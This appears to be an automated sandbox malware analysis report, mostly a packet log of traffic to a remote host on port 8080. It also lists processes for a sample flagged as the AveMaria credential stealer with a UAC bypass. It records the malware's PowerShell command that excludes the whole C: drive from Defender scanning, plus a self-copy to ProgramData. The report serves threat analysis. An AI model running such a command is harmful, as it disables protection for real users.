                                                                  May 22, 2022 12:34:30.048532963 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048572063 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048610926 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048640013 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048649073 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048688889 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048703909 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048731089 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048769951 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048810005 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048816919 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048849106 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048851967 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.048887014 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048926115 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048964977 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.048973083 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.049005032 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.049007893 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.049047947 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.049086094 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.049109936 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.049129009 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.049156904 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.049185038 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.124984980 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183150053 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183187008 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183208942 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183232069 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183258057 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183280945 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183304071 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183326960 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183350086 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183347940 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183376074 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183389902 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183398008 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183398962 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183403015 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183423042 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183423996 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183443069 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183475971 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183491945 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183497906 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183521986 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183546066 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183568001 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183569908 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183595896 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183598042 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183619022 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183643103 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183645010 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183667898 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183691025 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183691978 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183716059 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183738947 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183760881 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183764935 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183792114 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183794022 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183810949 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183826923 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183844090 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183856964 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183859110 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183876991 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183881044 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183895111 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183912039 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183917046 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183931112 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183939934 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.183948994 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183967113 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183984041 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.183986902 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.184000969 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184017897 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184020996 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.184036016 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184051037 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184062004 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.184068918 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184086084 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184099913 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.184102058 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184119940 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.184120893 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184139013 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184150934 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.184153080 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.184205055 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.258243084 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.258308887 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.258341074 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.258378029 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.316880941 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.316936016 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.316977024 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317003012 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317015886 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317055941 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317082882 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317096949 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317141056 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317157030 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317186117 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317225933 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317250967 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317264080 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317306042 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317325115 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317346096 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317384005 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317404985 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317424059 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317462921 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317487955 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317503929 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317547083 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317565918 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317586899 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317626953 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317646980 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317666054 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317703009 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317722082 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317743063 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317783117 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317800999 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317822933 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317862988 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317878008 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317902088 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317941904 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.317970037 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.317982912 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.318022013 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.318032026 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.318063021 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.318100929 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.318118095 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.318142891 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.318217039 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.318255901 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.318298101 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.318336964 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458714008 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458728075 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458753109 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458792925 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458821058 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458832979 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458872080 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458904982 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458913088 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458951950 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458969116 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458992004 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.459022045 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.459145069 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480554104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480613947 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480653048 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480668068 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480695009 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480710983 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480736971 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480751991 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480777025 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480818033 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480839014 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480856895 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480870962 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480899096 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480911970 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480940104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480957985 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480981112 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481014967 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481020927 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481060028 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481060982 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481082916 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481103897 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481122017 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481146097 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481183052 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481187105 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481218100 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481230021 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481230974 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481270075 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481280088 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481307983 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481321096 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481349945 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481358051 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481389999 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481420994 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481429100 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481446028 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481468916 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481470108 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481509924 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481529951 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481549978 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481564999 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481590986 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481628895 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481642008 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481668949 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481673002 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481709003 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481724024 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481748104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481761932 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481790066 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481827974 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481853008 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481868029 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481873035 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481908083 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481921911 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481946945 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481966972 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481987000 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482001066 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482027054 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482038975 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482069016 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482074976 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482110023 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482126951 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482147932 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482171059 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482189894 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482191086 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482230902 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482269049 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482292891 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482312918 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.615020037 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.615080118 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.615101099 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.615118980 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.615143061 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.615245104 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.697097063 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:33.296505928 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:33.479185104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:49.486371994 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:49.487315893 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:49.670778990 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:35:09.487752914 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:35:09.488626957 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:35:09.673516035 CEST80804974023.227.202.157192.168.2.3

Target ID: 0
Start time: 12:33:06
Start date: 22/05/2022
Path: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"
Imagebase: 0x400000
File size: 222720 bytes
MD5 hash: DABC6F0C75C134E5310BA3526ADBA833
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 1
Start time: 12:33:12
Start date: 22/05/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell Add-MpPreference -ExclusionPath C:\
Imagebase: 0x1c0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 2
Start time: 12:33:12
Start date: 22/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 4
Start time: 12:33:14
Start date: 22/05/2022
Path: C:\ProgramData\images.exe
Wow64 process (32bit): true
Commandline: C:\ProgramData\images.exe
Imagebase: 0x400000
File size: 222720 bytes
MD5 hash: DABC6F0C75C134E5310BA3526ADBA833
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
